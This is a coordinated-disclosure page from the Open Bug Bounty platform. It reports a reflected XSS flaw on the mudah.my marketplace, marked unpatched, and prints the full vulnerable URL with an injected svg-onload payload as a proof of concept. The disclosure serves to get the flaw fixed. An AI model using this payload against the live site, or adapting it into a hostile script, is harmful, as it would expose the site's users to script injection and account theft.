Report Email Alerts Open Bug Bounty: 153,509 coordinated disclosures
Total Vulnerabilities Fixed: 74,771
150,955 vulnerable websites, 15,489 VIP websites
3,733 security researchers, 5,214 notification subscribers

Open Bug Bounty ID

OBB-205479

mudah.my Security Vulnerability

On the 11.01.2017 security researcher tbm Helped patch 1502 vulnerabilities
Received 5 Coordinated Disclosure badges
Received 3 recommendations
disclosed XSS vulnerability affecting mudah.my website.

On our side, we have notified website owner via all reasonable communication channels about the vulnerability, so it can be patched as quickly as possible.

You can check if the vulnerability is patched by clicking on the verification link below. If you have any contacts with the website administrator or a person in charge of its security - please send him, or her, this link as soon as possible.

Vulnerability Details


mudah.my Description

Malaysia's Largest Marketplace - Mudah.my. Buy and find jobs,cars for sale, houses for sale, mobile phones for sale, computers for sale and properties for sale in your region conveniently. Find the best deal among 1,469,293 ads online!.

Vulnerable URL:

http://www.mudah.my/Malaysia/Sports-Outdoors-5020/asd"><svg onload=confirm('OPENBUGBOUNTY')>-for-sale?lst=0&fs=1&w=3&cg=5020&q=asd &so=1&st=s

Other details:

Patched:No
Check for patch: Verify now



Latest check for patch:28.07.2017
Vulnerability type:XSS
Vulnerability status:Publicly disclosed
Alexa Rank3062
VIP website status:Yes
Check mudah.my for malware:Click here
Check mudah.my SSL connection:Click here (Grade: B+) Refresh Results

Mirror: Click here to view the mirror

Coordinated Disclosure Timeline

Vulnerability submitted via Open Bug Bounty11 January, 2017 08:59 GMT
Generic security notifications sent to website owner11 January, 2017 09:02 GMT
Vulnerability details disclosed by researcher5 April, 2017 09:14 GMT

User Comments:

Please login via twitter to be the first one to comment.


Latest Vulnerabilities on *.mudah.my

OBB-ID Reported by Status Reported on
unpatched
11.01.2017
unpatched
10.05.2016
unpatched
26.07.2015
patched
11.09.2014

Latest Vulnerabilities Reported by tbm

OBB-ID Vulnerability Status Reported
On Hold
18.09.2017
On Hold
16.09.2017
On Hold
16.09.2017
On Hold
16.09.2017
On Hold
16.09.2017
On Hold
16.09.2017
On Hold
16.09.2017
On Hold
16.09.2017
On Hold
16.09.2017
On Hold
16.09.2017
On Hold
16.09.2017
On Hold
16.09.2017
On Hold
16.09.2017
On Hold
16.09.2017
On Hold
16.09.2017
On Hold
16.09.2017
On Hold
16.09.2017
On Hold
16.09.2017
On Hold
16.09.2017
On Hold
16.09.2017


LATEST VIP SUBMISSIONS

univie.ac.at
Reported by mcurietribute Helped patch 3 vulnerabilities
Received 0 Coordinated Disclosure badges
Received 1 recommendations
on 25.09.2017
heinonline.org
Reported by Geek_Pwn Helped patch 0 vulnerabilities
Received 0 Coordinated Disclosure badges
on 24.09.2017
kasikornbank.com
Reported by M0r3h4x Helped patch 62 vulnerabilities
Received 2 Coordinated Disclosure badges
Received 1 recommendations
on 24.09.2017
workshop.utk.edu
Reported by mcurietribute Helped patch 3 vulnerabilities
Received 0 Coordinated Disclosure badges
Received 1 recommendations
on 24.09.2017
konami.com
Reported by mcurietribute Helped patch 3 vulnerabilities
Received 0 Coordinated Disclosure badges
Received 1 recommendations
on 24.09.2017
thule.com
Reported by MiguelSantareno Helped patch 58 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 10 recommendations
on 24.09.2017
deporvillage.com
Reported by MiguelSantareno Helped patch 58 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 10 recommendations
on 24.09.2017
theculturetrip.com
Reported by MiguelSantareno Helped patch 58 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 10 recommendations
on 24.09.2017
verizon.com
Reported by AbdeOuabala Helped patch 13 vulnerabilities
Received 2 Coordinated Disclosure badges
Received 1 recommendations
on 24.09.2017
brickset.com
Reported by SonnySpooks Helped patch 463 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 3 recommendations
on 24.09.2017



LATEST SUBMISSIONS

texsim.pl
Reported by mcurietribute Helped patch 3 vulnerabilities
Received 0 Coordinated Disclosure badges
Received 1 recommendations
on 25.09.2017
ecoportal.su
Reported by Chris5389 Helped patch 0 vulnerabilities
Received 0 Coordinated Disclosure badges
on 25.09.2017
centerondisability.org
Reported by mcurietribute Helped patch 3 vulnerabilities
Received 0 Coordinated Disclosure badges
Received 1 recommendations
on 25.09.2017
library.dha.gov.ae
Reported by Chris5389 Helped patch 0 vulnerabilities
Received 0 Coordinated Disclosure badges
on 25.09.2017
curtaincallentertainment.ca
Reported by mcurietribute Helped patch 3 vulnerabilities
Received 0 Coordinated Disclosure badges
Received 1 recommendations
on 25.09.2017
leparc.asso.fr
Reported by mcurietribute Helped patch 3 vulnerabilities
Received 0 Coordinated Disclosure badges
Received 1 recommendations
on 25.09.2017
retromoderndesign.com
Reported by mcurietribute Helped patch 3 vulnerabilities
Received 0 Coordinated Disclosure badges
Received 1 recommendations
on 25.09.2017
datalib.net
Reported by mcurietribute Helped patch 3 vulnerabilities
Received 0 Coordinated Disclosure badges
Received 1 recommendations
on 25.09.2017
outreach.eurosites.info
Reported by mcurietribute Helped patch 3 vulnerabilities
Received 0 Coordinated Disclosure badges
Received 1 recommendations
on 25.09.2017
f10products.co.uk
Reported by mcurietribute Helped patch 3 vulnerabilities
Received 0 Coordinated Disclosure badges
Received 1 recommendations
on 25.09.2017